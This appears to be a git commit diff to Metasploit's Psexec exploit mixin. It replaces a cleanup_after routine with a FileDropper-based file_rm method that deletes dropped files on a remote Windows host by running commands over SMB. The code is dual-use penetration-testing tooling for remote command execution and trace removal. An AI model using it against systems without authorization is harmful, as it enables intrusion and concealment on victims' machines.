Made changes to cleanup to use file_dropper instead
Royce Davis
parent
7361e1041f
commit
6773a10632
|
|
@ -12,6 +12,7 @@ module Exploit::Remote::Psexec
|
|||
|
||||
include Msf::Exploit::Remote::DCERPC
|
||||
include Msf::Exploit::Remote::SMB
|
||||
include Msf::Exploit::FileDropper
|
||||
|
||||
# Retrieves output from the executed command
|
||||
#
|
||||
|
|
@ -47,7 +48,7 @@ module Exploit::Remote::Psexec
|
|||
# @param command [String] Should be a valid windows command
|
||||
# @return [Boolean] true if everything wen't well
|
||||
def psexec(command)
|
||||
|
||||
print_status("#{peer} - Executing: #{command}")
|
||||
simple.connect("IPC$")
|
||||
|
||||
handle = dcerpc_handle('367abb81-9844-35f1-ad32-98f038001003', '2.0', 'ncacn_np', ["\\svcctl"])
|
||||
|
|
@ -157,34 +158,20 @@ module Exploit::Remote::Psexec
|
|||
return true
|
||||
end
|
||||
|
||||
# This is the cleanup method, removes .txt and .bat file/s created
|
||||
# during execution
|
||||
#
|
||||
# @example
|
||||
# cleanup_after("C$", rhost, '\WINDOWS\Temp\output.txt', 'C:\WINDOWS\Temp\batchfile.bat')
|
||||
#
|
||||
# @param smbshare [String] The SMBshare to connect to. Usually C$
|
||||
# @param ip [String] IP address of remote host to connect to
|
||||
# @param text [String] Path to the text file relative to the smbshare
|
||||
# @param bat [String] Full path to the batch file created
|
||||
# @return [StandarError] only in the event of an error
|
||||
def cleanup_after(smbshare, ip, text, bat)
|
||||
begin
|
||||
# Try and do cleanup command/s
|
||||
cleanup = "%COMSPEC% /C del %SYSTEMDRIVE%#{text} & del #{bat}"
|
||||
print_status("#{peer} - Executing cleanup...")
|
||||
psexec(cleanup)
|
||||
if !check_cleanup(smbshare, ip, text)
|
||||
print_error("#{peer} - Unable to cleanup. Make sure to manually remove files from the target.")
|
||||
else
|
||||
print_status("#{peer} - Cleanup was successful")
|
||||
end
|
||||
rescue StandardError => cleanuperror
|
||||
print_error("#{peer} - Unable to processes cleanup commands. Error: #{cleanuperror}")
|
||||
print_error("#{peer} - Make sure to manually remove files from the target")
|
||||
return cleanuperror
|
||||
end
|
||||
end
|
||||
# This method is called by file_dropper to remove files droped
|
||||
# By your module
|
||||
#
|
||||
# @example
|
||||
# file_rm('C:\WINDOWS\Temp\output.txt')
|
||||
#
|
||||
# @param file [String] Full path to a file on the remote host
|
||||
# @return [StandardError] only in the event of an error
|
||||
def file_rm(file)
|
||||
delete = "%COMSPEC% /C del #{file}"
|
||||
print_status("#{peer} - Deleting #{file}")
|
||||
psexec(delete)
|
||||
print_status("#{peer} - Command Ran")
|
||||
end
|
||||
|
||||
# Make sure the cleanup command worked
|
||||
# This method should only be called from within cleanup_after
|
||||
|
|
|
|||
Loading…
Reference in New Issue